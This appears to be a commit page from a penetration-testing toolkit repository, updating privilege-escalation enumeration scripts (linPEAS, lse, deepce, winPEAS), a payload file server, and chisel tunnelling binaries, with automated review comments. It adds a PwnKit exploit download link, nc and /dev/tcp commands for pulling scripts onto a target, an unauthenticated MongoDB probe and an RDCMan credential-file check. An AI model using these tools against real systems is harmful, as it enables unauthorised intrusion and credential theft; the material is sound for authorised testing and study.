
Project Update

Roman Hergenreder 2 years ago
parent
commit
1f55516c59
12 changed files with 105 additions and 197 deletions
  1. BIN
      chisel64
  2. 1 1
      deepce.sh
  3. 9 4
      fileserver.py
  4. 74 188
      linpeas.sh
  5. 11 0
      linux-exploit-suggester.sh
  6. 8 2
      lse.sh
  7. 1 1
      util.py
  8. BIN
      win/chisel.exe
  9. BIN
      win/chisel64.exe
  10. 1 1
      win/winPEAS.bat
  11. BIN
      win/winPEAS.exe
  12. BIN
      win/winPEASx64.exe

BIN
chisel64


+ 1 - 1
deepce.sh

@@ -347,7 +347,7 @@ containerCheck() {
   # Are we inside kubenetes?
   if grep "/kubepod" /proc/1/cgroup -qa; then
     inContainer="1"
-    containerType="kubentes"
+    containerType="kubernetes"
   fi
 
   # Are we inside LXC?
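Review bot: The comment directly above the changed line, `# Are we inside kubenetes?`, still carries the spelling error this commit fixes in the `containerType` value; change it to `# Are we inside Kubernetes?` so the comment and the string agree. Outside the change itself, the `grep "/kubepod" /proc/1/cgroup` test depends on the cgroup v1 path being visible in /proc/1/cgroup; inside a container on a cgroup v2 host that file typically shows only `0::/`, so the Kubernetes detection can silently miss — a caveat comment such as `# cgroup v1 path only; on cgroup v2 hosts /proc/1/cgroup is usually "0::/" and this check misses` would warn the next reader. containerCheck() begins and ends outside this hunk.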

+ 9 - 4
fileserver.py

@@ -86,6 +86,8 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
         if path in self.server.dumpRequests:
             headers["Access-Control-Allow-Origin"] = "*"
 
+        headers["Content-Length"] = len(data)
+
         if len(headers) == 0:
             self.send_response(status_code)
         else:
@@ -149,11 +151,14 @@ class HttpFileServer(HTTPServer):
         if isinstance(data, str):
             data = data.encode("UTF-8")
 
-        # return 200 - OK and data
+        headers = { 
+            "Access-Control-Allow-Origin": "*",
+        }
         if mimeType:
-            self.addRoute(name, lambda req: (200, data, { "Content-Type": mimeType }))
-        else:
-            self.addRoute(name, lambda req: (200, data))
+            headers["Content-Type"] = headers
+
+        # return 200 - OK and data
+        self.addRoute(name, lambda req: (200, data, headers))
 
     def dumpRequest(self, name):
         self.dumpRequests.append(self.cleanPath(name))
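Review bot: `headers["Content-Type"] = headers` in hostFile assigns the dict to itself, so a file hosted with a mimeType is served with a Content-Type whose value is the dict's repr instead of the type; the line should read `headers["Content-Type"] = mimeType`. In the first hunk `headers["Content-Length"] = len(data)` is set unconditionally, which means the `if len(headers) == 0:` branch just below it can no longer be taken and can be dropped, and `len(data)` is only the right Content-Length if `data` is already bytes at that point, which this hunk does not show. `Access-Control-Allow-Origin: *` is now applied to every hosted file; presumably that is intended so payloads can fetch hosted files cross-origin, and a one-line comment to that effect would stop a future reader from tightening it. Both enclosing methods start outside their hunks.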

+ 74 - 188
linpeas.sh


+ 11 - 0
linux-exploit-suggester.sh

@@ -1490,6 +1490,17 @@ exploit-db: https://www.exploit-db.com/exploits/41154
 EOF
 )
 
+EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
+Name: ${txtgrn}[CVE-2021-4034]${txtrst} PwnKit
+Reqs: pkg=polkit|policykit-1,ver<=0.105-31
+Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
+Rank: 1
+analysis-url: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
+src-url: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
+author: berdav
+EOF
+)
+
 ###########################################################
 ## security related HW/kernel features
 ###########################################################
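Review bot: The `Reqs: pkg=polkit|policykit-1,ver<=0.105-31` threshold on the new PwnKit entry is the upstream version cut, but the distributions named in `Tags:` shipped the fix as backports under lower version strings (as far as I recall, Debian 11 as 0.105-31+deb11u1 and Ubuntu 20.04 as 0.105-26ubuntu1.2), so this entry will presumably list patched hosts as candidates. The file already uses a `Comments:` field for this situation elsewhere; adding `Comments: Distros use own versioning scheme. Manual verification needed.` to this entry keeps the hit from being over-read. The `src-url` fetches the `main` branch archive rather than a pinned commit, so what a user downloads and runs can change after this entry was reviewed; pointing the URL at a specific commit hash is the safer choice for an exploit that is executed as-is. The EXPLOITS_USERSPACE array this entry is appended to is defined outside the hunk.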

+ 8 - 2
lse.sh

@@ -5,7 +5,7 @@
 # Author: Diego Blanco <diego.blanco@treitos.com>
 # GitHub: https://github.com/diego-treitos/linux-smart-enumeration
 #
-lse_version="3.7"
+lse_version="3.9"
 
 #( Colors
 #
@@ -502,7 +502,8 @@ lse_serve() {
     cecho "${green}   * ${white}wget ${reset}           '$ip:$port' -O lse.sh; chmod 755 lse.sh\n"
     cecho "${green}   * ${white}exec 3<>/dev/tcp/${reset}$ip/$port;printf '\\\\n'>&3;cat<&3>lse.sh;exec 3<&-;chmod 755 lse.sh\n"
   done
-  nc -l -q0 -p "$port" < "$0" >/dev/null
+  # try nc with '-N' (openbsd), then ncat and then use '-q0' (traditional)
+  nc -l -N -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l --send-only -p "$port" < "$0" >/dev/null 2>/dev/null || nc -l -q0 -p "$port" < "$0" >/dev/null
 }
 lse_header() {
   local id="$1"
@@ -1262,6 +1263,11 @@ lse_run_tests_software() {
     "Can we write to screen session sockets from other users?" \
     'find /run/screen -type s -writable -regex "/run/screen/S-.+/.+" ! -user $lse_user -exec ls -l {} +'
 
+  #check connection to mongoDB
+  lse_test "sof170" "1" \
+    "Can we access MongoDB databases without credentials?" \
+    'echo "show dbs" | mongo --quiet | grep -E "(admin|config|local)"'
+
   #sudo version - check to see if there are any known vulnerabilities with this
   lse_test "sof500" "2" \
     "Sudo version" \
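Review bot: The new sof170 test greps the `show dbs` output with an unanchored `(admin|config|local)`, so any output line containing one of those words counts as an open database — an authorization error whose message mentions `admin`, for instance, would make the "without credentials" test fire in exactly the authenticated case it is meant to exclude; anchoring the match on the database column, e.g. `grep -E "^(admin|config|local)\b"`, avoids that. The test also only calls the legacy `mongo` shell, so hosts that ship only `mongosh` report nothing; a fallback such as `(mongosh --quiet 2>/dev/null || mongo --quiet 2>/dev/null)` covers both. In lse_serve, the `||` chain means a non-zero exit from an nc that already served the file re-serves it with the next variant, which is acceptable here but worth a word in the new comment. lse_run_tests_software continues outside the hunk.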

+ 1 - 1
util.py

@@ -193,7 +193,7 @@ if __name__ == "__main__":
             output = set_exif_data(payload, _in, _out, tag)
             sys.stdout.buffer.write(output)
             sys.stdout.flush()
-    elif command == "help":
+    else:
         print("Usage: %s [command]" % bin)
         print("Available commands:")
         print("   help, getAddress, pad, exifImage")
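Review bot: With `elif command == "help":` turned into `else:`, a mistyped command now prints the usage exactly like `help` and, as far as this hunk shows, still exits 0, so a calling script cannot tell a typo from a help request. Exiting non-zero only for the unknown case, e.g. `if command != "help": sys.exit(1)` after the usage lines, keeps the help path unchanged while making the error detectable; `sys` is already in use two lines up. The `__main__` block that assigns `command` and `bin` starts outside this hunk.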

BIN
win/chisel.exe


BIN
win/chisel64.exe


+ 1 - 1
win/winPEAS.bat

@@ -237,7 +237,7 @@ CALL :T_Progress 2
 :RemodeDeskCredMgr
 CALL :ColorLine " %E%33m[+]%E%97m Remote Desktop Credentials Manager"
 ECHO.   [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#remote-desktop-credential-manager
-IF exist "%AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
+IF exist "%LOCALAPPDATA%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings" ECHO.Found: RDCMan.settings in %AppLocal%\Local\Microsoft\Remote Desktop Connection Manager\RDCMan.settings, check for credentials in .rdg files
 ECHO.
 CALL :T_Progress 1
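Review bot: The new `IF exist` path appends `\Local\Microsoft\...` to `%LOCALAPPDATA%`, but `%LOCALAPPDATA%` already expands to `C:\Users\<user>\AppData\Local`, so the check looks under `...\AppData\Local\Local\Microsoft\...` and will not find the file; the path should be `%LOCALAPPDATA%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings`. The ECHO on the same line still prints `%AppLocal%`, which the test no longer uses, so the message would show an empty or literal variable even when the check fired — use `%LOCALAPPDATA%` there as well. If a `SET AppLocal=...` earlier in the script (outside this hunk) defines it as `%USERPROFILE%\AppData`, then only the variable name needed aligning and the trailing `\Local` was correct for that variable, so confirm against the top of the file before applying.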
 

BIN
win/winPEAS.exe


BIN
win/winPEASx64.exe

